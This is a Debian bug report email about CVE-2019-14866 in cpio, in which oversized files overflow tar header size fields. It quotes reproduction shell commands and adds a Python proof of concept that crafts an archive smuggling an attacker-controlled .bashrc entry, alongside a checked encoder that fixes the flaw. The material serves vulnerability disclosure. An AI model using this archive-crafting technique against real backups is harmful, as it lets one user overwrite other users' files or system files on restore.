Control: retitle -1 cpio: CVE-2019-14866: improper input validation when 
writing tar header fields leads to unexpected tar generation

Hi,

On Mon, Sep 30, 2019 at 10:58:37AM +0100, Thomas Habets wrote:
> Package: cpio
> 
> This command looks safe, and is a reasonable "backup" command:
> find /home -type f | cpio -H tar -o > /var/backups/backup.tar
> 
> But if /home/evil/foo.data is maliciously set up (size is >8GiB) then the
> tar file can be made to have arbitrary content, so a restore could
> overwrite /etc/passwd or anything else under the restore tree, using any
> permissions. A world writable /dev/sda would also be bad, as would many
> other fun variants. Likewise, a user controlling /home/evil can inject
> /home/friendly/.bashrc content too.
> 
> Patch at https://cement.retrofitta.se/tmp/cpio-tar.patch
> 
> Patch commit message:
> 
> Check for size overflow in tar header fields.
> 
>     This prevents surprising outputs being created, e.g. this cpio tar
>     output with more than one file:
> 
>     tar cf suffix.tar AUTHORS
>     dd if=/dev/zero seek=16G bs=1 count=0 of=suffix.tar
>     echo suffix.tar | cpio -H tar -o | tar tvf -
> 
>     -rw-r--r-- 1000/1000       0 2019-08-30 16:40 suffix.tar
>     -rw-r--r-- thomas/thomas 161 2019-08-30 16:40 AUTHORS

In the meantime, CVE-2019-14866 was assigned for this issue.

Regards,
Salvatore

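The mechanism Thomas describes above, as an added example that is not cpio's code and not the patch he links: a Python re-implementation of an unchecked, cpio-style octal field encoder (the low digits are kept and the high ones silently dropped) next to a checked variant, with the resulting bytes fed to Python's standard-library tarfile reader. The member names, the 16 GiB declared size and the smuggled .bashrc content are constructed for this demo; only the first 1024 bytes of the "huge" file are emitted, because the reader's behaviour is decided entirely by the header's size field.

```python
"""Show how an overflowed tar 'size' field lets file content be parsed as
additional archive entries (the CVE-2019-14866 pattern).

Added example, not cpio's own code. Constructed inputs throughout.
"""
import io
import tarfile

BLOCK = 512
USTAR_SIZE_MAX = 8 ** 11 - 1           # 11 octal digits + NUL: 8 GiB - 1
DECLARED_SIZE = 16 * 1024 ** 3         # 16 GiB, as in the report
SMUGGLED_NAME = b"home/friendly/.bashrc"
SMUGGLED_DATA = b"# line injected by the owner of /home/evil\n"


def to_oct_unchecked(value: int, digits: int) -> bytes:
    """Emit the low (digits-1) octal digits of value, NUL-terminated.
    Higher digits are silently discarded, so 2**34 becomes all zeros."""
    digits -= 1                         # leave room for the trailing NUL
    out = bytearray(b"0" * digits)
    i = digits
    while True:
        i -= 1
        out[i] = ord("0") + (value & 7)
        value >>= 3
        if i == 0 or value == 0:
            break
    return bytes(out) + b"\0"


def to_oct_checked(value: int, digits: int) -> bytes:
    """Hardened encoder: refuse any value that does not fit the field."""
    if not 0 <= value <= 8 ** (digits - 1) - 1:
        raise OverflowError(f"{value} does not fit in {digits - 1} octal digits")
    return to_oct_unchecked(value, digits)


def fits_ustar(value: int) -> bool:
    """True if the checked encoder accepts value for the 12-byte size field."""
    try:
        to_oct_checked(value, 12)
        return True
    except OverflowError:
        return False


def ustar_header(name: bytes, size: int, mode: int, encoder) -> bytes:
    """Build a 512-byte ustar header; encoder fills the numeric fields."""
    hdr = bytearray(BLOCK)
    hdr[0:len(name)] = name                      # name (<= 100 bytes)
    hdr[100:108] = encoder(mode, 8)              # mode
    hdr[108:116] = encoder(0, 8)                 # uid
    hdr[116:124] = encoder(0, 8)                 # gid
    hdr[124:136] = encoder(size, 12)             # size (the field at issue)
    hdr[136:148] = encoder(0, 12)                # mtime
    hdr[148:156] = b" " * 8                      # checksum placeholder
    hdr[156] = ord("0")                          # typeflag: regular file
    hdr[257:263] = b"ustar\0"                    # magic
    hdr[263:265] = b"00"                         # version
    hdr[148:156] = b"%06o\0 " % sum(hdr)         # checksum over the block
    return bytes(hdr)


def evil_file_prefix() -> bytes:
    """First 1024 bytes of the attacker's sparse >8 GiB file: a complete,
    well-formed tar member for a file in someone else's home."""
    inner = ustar_header(SMUGGLED_NAME, len(SMUGGLED_DATA), 0o644, to_oct_checked)
    return inner + SMUGGLED_DATA.ljust(BLOCK, b"\0")


def archive_with(encoder) -> bytes:
    """What a tar writer emits for home/evil/foo.data with the given encoder,
    followed by the attacker-controlled data blocks and the end-of-archive
    marker. With the unchecked encoder the size field reads as 0."""
    outer = ustar_header(b"home/evil/foo.data", DECLARED_SIZE, 0o644, encoder)
    return outer + evil_file_prefix() + b"\0" * (2 * BLOCK)


def list_members(archive: bytes) -> list:
    """Return [(name, size), ...] exactly as a real tar reader sees them."""
    with tarfile.open(fileobj=io.BytesIO(archive)) as tf:
        return [(m.name, m.size) for m in tf.getmembers()]


if __name__ == "__main__":
    print("unchecked size field:", to_oct_unchecked(DECLARED_SIZE, 12))
    print("reader sees:", list_members(archive_with(to_oct_unchecked)))
    try:
        archive_with(to_oct_checked)
    except OverflowError as e:
        print("checked encoder refused:", e)
```

With the unchecked encoder the reader lists home/evil/foo.data with size 0 and then home/friendly/.bashrc as a second, fully attacker-controlled member, which is the listing Thomas shows for suffix.tar; the checked encoder aborts before a single header byte is written, which is the only safe outcome for a value the format cannot represent.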